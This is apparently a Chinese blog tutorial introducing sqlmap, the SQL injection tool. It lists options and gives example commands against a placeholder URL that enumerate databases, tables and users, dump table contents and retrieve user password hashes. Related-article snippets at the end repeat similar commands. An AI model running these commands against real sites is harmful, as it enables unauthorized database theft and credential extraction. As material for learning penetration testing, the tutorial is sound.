SQL注入之SQLmap入门

最新推荐文章于 2024-05-16 21:13:46 发布
置顶 最新推荐文章于 2024-05-16 21:13:46 发布
阅读量2.1k 收藏 3
点赞数 4
分类专栏: 笔记 MySql 文章标签: mysql 数据安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/da13122318861/article/details/103901450
版权

sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了。现在支持python3了

基本参数

is-dba          当前用户权限
dbs             所有数据库
current-db      当前数据库
users               所有用户
current-user        当前用户
--tables            
--columns
--dump
--dump-all
--level
--passwords         枚举所有用户密码
--roles             列出数据库dbajuese
--privileges        列出数据库dba权限
-D
-T
-C
--dbms=mysql oracle mssql   指定数据库
--schema --batch --exclude-sysdbs  查看数据库的架构 (比较大的一个命令)

使用实例:

#是否存在注入点
sqlmap -u 'http://www.xxxx.com/mod.php?id=1'

在这里插入图片描述

#判断是不是dba权限
sqlmap -u 'http://www.xxxx.com/mod>id=1' --is-dba

在这里插入图片描述

#列所有的数据库
sqlmap -u 'http://www.xxxx.com/mod?id=1' --dbs

在这里插入图片描述

#看当前用户
sqlmap -u 'http://www.xxxx.com?id=1' --current-user

在这里插入图片描述

#查看当前数据库
sqlmap -u 'http://www.xxxx.com?id=1' --current-db

在这里插入图片描述

#查看数据库的表
sqlmap -u 'http://www.xxxx.com?id=1' --tables -D dbname

在这里插入图片描述

#查看test数据库中sc表的列
sqlmap -u http://www.xxxx.com?id=1 --columns -T tablename -D dbname

在这里插入图片描述

#把表中的数据转储
sqlmap -u 'http://www.xxxx.com?id=1' --dump -T tablename -D dbname
#或者只转储某几列
sqlmap -u 'http://www.xxxx.com?id=1' --dump -C id,name -T tablename -D dbname

在这里插入图片描述

#查看有哪些用户
sqlmap -u 'http://www.xxxx.com?id=1' --users

#查看用户密码
sqlmap -u 'http://www.xxxx.com?id=1' --passwords
Tom不秃
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sqlmap学习(十二)检索DBMS信息
rane的博客
03-29 357
1、sqlmap检索DBMS banner 参数:-b、--banner python sqlmap.py -u "http://172.17.0.1/Less-3/?id=1" -b 2、sqlmap检索DBMS当前用户 参数:--current-user 3、sqlmap检索DBMS当前数据库 参数:--current-db 4、sqlmap检索DBMS当前主机名 参数:--hostn...
SQL注入攻防入门详解
11-12
1. 使用工具检测:如SQLMap、Burp Suite等自动化工具可以帮助识别SQL注入漏洞。 2. 模糊测试:通过构造异常输入,发现潜在的注入点。 3. 应用防火墙和WAF:配置适当的规则,拦截SQL注入攻击。 4. 教育和培训:提高...
sqlmap工具使用
huangyongkang666的博客
03-21 3559
sqlmap工具使用 1.sqlmap介绍 SQLMAP是开源的自动化SQL注入工具,由Python写成,具有如下特点: 1、完全支持MySQL、Oracle、PostgreSQL、MSSQL、Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。 2、完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。 3、在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而
SQLMap安装教程
weixin_45014379的博客
03-10 3370
注意:在python3环境下安装sqlmap的时候会提示需要在python2的环境下才能安装,其实在python3.6以后也都支持sqlmap了。
SQLMAP的下载安装和使用(Windows)
最新发布
weixin_68416970的博客
05-16 1428
SQLMAP 是一款广泛使用的开源 SQL 注入检测和利用工具。本文介绍了SQLMAP的下载安装和基本使用。SQLMAP 这样的工具在合法的安全测试和研究环境之外的使用可能是非法的和不道德的。在实际应用中,应该在授权和合法的情况下使用它来帮助发现和修复系统中的安全漏洞,以提高系统的安全性。
渗透工具sqlmap下载安装超详细教程Windows
热门推荐
weixin_56306210的博客
07-20 1万+
渗透工具sqlmap下载安装超详细教程Windows
【网络安全-sql注入(5)】sqlmap以及几款自动化sql注入工具的详细使用过程(提供工具)
m0_67844671的博客
10-03 2323
本篇文章详细介绍了sqlmap工具和使用,如何用sqlmap进行自动化的SQL注入,还讲解了穿山甲,萝卜头等自动化SQL注入工具
exe版sqlmap注入工具
07-26
SQLMap是一款著名的开源自动化SQL注入工具,主要用于检测和利用SQL注入漏洞,以获取数据库中的敏感信息,甚至完全控制系统。在给定的“exe版sqlmap注入工具”中,我们可以理解为这个版本是专为不支持Python环境的...
sql注入入门教程(附源码分析)
03-07
主要是对sql基本原理,加部分sqlmap源码分析
最佳入门教程之SQL注入1
07-29
软件测试最佳入门教程之SQL注入1 软件测试最佳入门教程之SQL注入1
SQL注入攻击与防御
10-04
SQL注入是Internet上最危险、最有名的安全漏洞之一,本书是目前唯一一本专门致力于讲解SQL威胁的图书。本书作者均是专门研究SQL注入的安全专家,他们集众家之长,对应用程序的基本编码和升级维护进行全面跟踪,详细...
SqlMap自动生成小工具SqlMapAutoGen1.0
03-07
设计思路: 通过java原生的反射机制获取java类的私有字段 1)获取字段名转换成数据库字段名 注意这里有潜规则,默认是这样处理的 createDateTime --> CREATE_DATE_TIME car --> CAR 2)根据字段的java类型获取jdbc类型 我只定义了以下规则 // javaType --> jdbcType rules.put("java.lang.String", "VARCHAR"); rules.put("java.lang.Long", "DECIMAL"); rules.put("java.lang.Integer", "DECIMAL"); rules.put("java.math.BigDecimal", "DECIMAL"); rules.put("java.util.Date", "TIMESTAMP"); 在SqlMapAutoGen类的构造函数中,可以自行修改 3)预先定义了模板 temple.xml (请放在D:/test 目录下) temple.xml定义了insert、update和delete方法 模板中定义了一系列的特殊字符串,如#BASE_COLUMN_LIST# #BASE_COLUMN_LIST# #BASE_COLUMN_LIST#代表数据库字段列表 在SqlMapAutoGen类中,通过程序自动生成这些字符串,然后再做替换写入到文件中 生成的文件也存储在D:/test目录下 文件名 = 表名 + "_SqlMap.xml"
sqlmap使用方法
08-26
sqlmap -p 指定测试参数 -b 获取banner --dbs 列举数据库 --is-dba 是否是管理员权限 --current-db 当前数据库 --current-user 当前用户 --tables 列举数据库的表名 --count 检索所有条目数 --columns 获取表的列名 --dump 获取表中的数据,包含列 --dump-all 转存DBMS数据库所有表项目 --level 测试等级(1-5),默认为1 -v 显示详细信息 读取数据库--->读取表---->读取表的列---->获取内容
sqlmap工具
05-31
验证SQL漏洞
最受欢迎的十款SQL注入工具
2301_77472496的博客
08-28 4684
为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以点击免费领取(如遇扫码问题,可以在评论区留言领取哦)~《网络安全入门+进阶学习资源包》CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享网络安全源码合集+工具包​​。
Sqlmap基础(二)之Mysql和Mssql注入
weixin_43822735的博客
11-03 544
Mysql数据库的注入 测试注入点:http://bbb.com/view.asp?id=1 sqlmap.py –u “http://aaa.com/view.asp?id=1”测试后发现是mysql数据库。 常用指令:is-dba当前用户是否有权限 dbs 查询所有数据库 current-db 网站当前数据库 users 所有数据库用户 current-user当前数据库用户 第一步:sq...
渗透测试工具sqlmap基础教程
wjy397的专栏
12-16 1735
http://blog.csdn.net/zgyulongfei/article/details/41017493 版权声明:本文为博主原创文章,未经博主允许不得转载。 目录(?)[+] 转载请注明出处:http://blog.csdn.net/zgyulongfei/article/details/41017493 作者:羽龍飛  本
sqlmap使用教程sql注入
08-17
- *1* *2* *3* [SQL注入sqlmap入门教程](https://blog.csdn.net/m0_56634355/article/details/124058943)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值